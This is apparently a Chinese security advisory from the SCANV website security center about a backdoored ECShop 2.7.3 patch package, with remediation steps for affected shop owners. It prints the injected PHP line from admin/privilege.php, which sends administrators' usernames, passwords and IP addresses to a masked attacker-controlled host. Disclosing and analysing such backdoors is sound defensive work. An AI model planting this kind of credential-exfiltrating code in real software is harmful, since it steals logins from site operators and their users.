ECShop是很多站長喜歡用的網(wǎng)店程序，其V2.7.3版本用戶甚眾。

2013年5月，SCANV網(wǎng)站安全中心曾經(jīng)響應(yīng)過ECShop網(wǎng)店程序的后門事件，本以為此事已了，不料在近日，又有安全研究人員在漏洞平臺Wooyun上發(fā)現(xiàn)了ECShop官方補丁的后門代碼。

經(jīng)SCANV網(wǎng)站安全研究人員分析發(fā)現(xiàn)，這一次的后門代碼存在于一個編號為273utf8_patch006的歷史補丁文件包中。駭客將補丁包里的(\admin\privilege.php)文件篡改后，插入了一段記錄后臺用戶及密碼等信息的代碼，并發(fā)送到一個由黑客控制的服務(wù)器上。值得注意的是，SCANV安全研究人員在分析前兩次補丁后門代碼里并沒有發(fā)現(xiàn)本次的后門代碼，因此，本次后門事件可能發(fā)生在前兩次篡改之前。

本次駭客植入的后門代碼：

文件\admin\privilege.php代碼113-114行：

@file_get_contents('http://[馬賽

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通過進一步分析發(fā)現(xiàn)“http://[馬賽克]/”網(wǎng)站實際是被黑客入侵控制的網(wǎng)站(“肉雞”)，而且黑客用來收集密碼等信息的文件目錄還可以“歷遍文件”，如圖：

 #p#

經(jīng)過SCANV網(wǎng)站安全研究人員的下載并去重，發(fā)現(xiàn)大概有90個域名網(wǎng)站受影響。列表如下：

SCANV網(wǎng)站安全研究中心推薦的解決方案：

1、使用ecshoop的站長朋友，核對上面公布的域名，并查看文件\admin\privilege.php內(nèi)容，搜索關(guān)鍵詞“w2.php”。如果找到上面提到的惡意代碼，請直接刪除后保存。

2、修改所有擁有后臺權(quán)限的用戶的密碼，并通知網(wǎng)站所有用戶修改密碼。

3、復(fù)查網(wǎng)站及服務(wù)器的安全狀況。

目前，官方已在6月3日發(fā)布新的補丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html)，請站長及時檢查修復(fù)。

SCANV網(wǎng)站安全中心在此提醒廣大站長，為自己Web程序下載補丁文件時一定要做相應(yīng)的檢查，哪怕該補丁文件是從官方網(wǎng)站上下載的，也有可能感染惡意后門。正在使用該網(wǎng)店程序的站長可登錄：http://www.scanv.com/tools/#ECShop給自己的ECShop站點做個安全檢測，平時可經(jīng)常登錄SCANV網(wǎng)站安全中心，以便第一時間了解自己網(wǎng)站的安全情況。